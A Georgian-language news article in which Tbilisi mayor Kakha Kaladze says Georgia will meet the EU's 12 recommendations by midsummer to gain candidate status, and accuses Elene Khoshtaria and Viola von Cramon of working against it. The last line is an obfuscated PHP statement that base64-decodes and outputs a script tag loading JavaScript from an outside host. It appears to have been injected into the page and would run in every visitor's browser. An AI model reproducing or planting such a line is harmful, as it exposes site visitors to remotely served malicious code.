celsiusi
ავერსი საქკაბელი

12 რეკომენდაციის მიმართულებით მუშაობა დაწყებულია და არა მხოლოდ მუშაობა, კონკრეტული ნაბიჯები არის გადადგმული, ვფიქრობ, ივნისის ბოლოს, ივლისისთვის ყველა რეკომენდაცია იქნება შესრულებული, – ამის შესადებ დედაქალაქის მერმა, კახა კალაძემ განაცხადა.

მისი თქმით, დარჩენილია რამდენიმე მიმართულება და ყველაფერი კეთდება, რომ ეს რეკომენდაციების შესრულდეს, რადგან ქვეყანამ მიიღოს კანდიდატის სტატუსი.

კითხვაზე, „თქვენი პოსტი გადააზიარა ელენე ხოშტარიამ, შემდეგ ვიოლა ფონ კრამონმა და დააწერეს, რომ საქართველო თუ მიიღებს კანდიდატის სტატუსს, ეს ხალხის დამსახურება იქნება და არა ხელისუფლების, ამას როგორ შეაფასებთ“, კალაძემ აღნიშნა: „არ ვიცი ახლა რამდენად სწორი იქნება ამაზე სერიოზული კომენტარის გაკეთება, ვიცით, ეს ადამიანები რას წარმოადგენენ, ვინ არიან, რა არის მათი მოტივაცია და პირდაპირ შეიძლება ითქვას, რომ მათი მთავარი მიზანი, ამოცანა და მოტივაციაა, რომ ქვეყანამ სტატუსი არ მიიღოს და ამისთვის ყველაფერს აკეთებენ“.

მისივე თქმით, საქართველო, ქართველი ხალხი და ხელისუფლება იმსახურებს სტატუსს და იმსახურებდა მაშინ, როდესაც სხვა ქვეყნებს მისცეს აღნიშნული სტატუსი, რადგან საქართველო ყველაფერში იყო მოწინავე.

„საქართველო ყველაფერში იყო წინ კონკრეტული გადადგმული ნაბიჯებით, განხორციელებული რეფორმებით, თუმცა აქაც იყო მზაკვრული გეგმა, იყო პოლიტიკური გადაწყვეტილება. ყველაფერ ამის მიუხედავად, ევროინტეგრაციის რთულ გზაზე, საქართველოს ხელისუფლება ყველაფერს გააკეთებს, რათა აღნიშნული 12 რეკომენდაცია იყოს შესრულებული“, – განაცხადა კახა კალაძემ. 

246
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");